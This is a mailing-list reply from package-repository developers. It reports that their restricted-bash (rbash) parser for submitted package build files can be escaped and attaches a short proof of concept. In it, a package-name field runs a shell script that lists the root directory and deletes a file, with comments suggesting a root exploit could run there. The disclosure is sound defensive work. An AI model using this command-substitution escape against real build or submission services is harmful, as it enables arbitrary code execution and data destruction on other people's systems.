On Fri, Jun 20, 2008 at 12:54:29AM +0800, Callan Barrett wrote: > Here's another iteration of this patch, I'm still looking for as much > input as possible but this is basically what I would push to testing > at this point. The script now outputs in a different format to be > parsed and there is some cleanup done in pkgsubmit.php to get it > working more cleanly with the script. > Unfortunately Callan and I found a way to easily defeat this tonight, the proof-of-concept is attached, the attack is based on this little bit about restricted shells (from the manpage): --- When a command that is found to be a shell script is executed (see COM- MAND EXECUTION above), rbash turns off any restrictions in the shell spawned to execute the script. ---
Too bad too, real bash parsing would have been nice :/ -S
#!/bin/bash ulimit -t 1 export PATH='' exec /bin/bash --noprofile --norc --restricted << EOF source TEST [ -n "\$pkgname" ] && echo -e "%PKGNAME%\n\$pkgname\n" EOF
pkgname=$(fucked.sh)
#!/bin/bash # THIS SHOULD NOT WORK /bin/ls -l / /bin/rm /home/simo/foobar # anything else could be executed here.... for instance a root exploit uploaded # with the package # this doesnt infinite loop because oddly enough ulimit still applies # and cannot be changed #while [ 0 -eq 0 ]; do # echo "you got fucked son" #done
pgpIkpTbqCWJe.pgp
Description: PGP signature
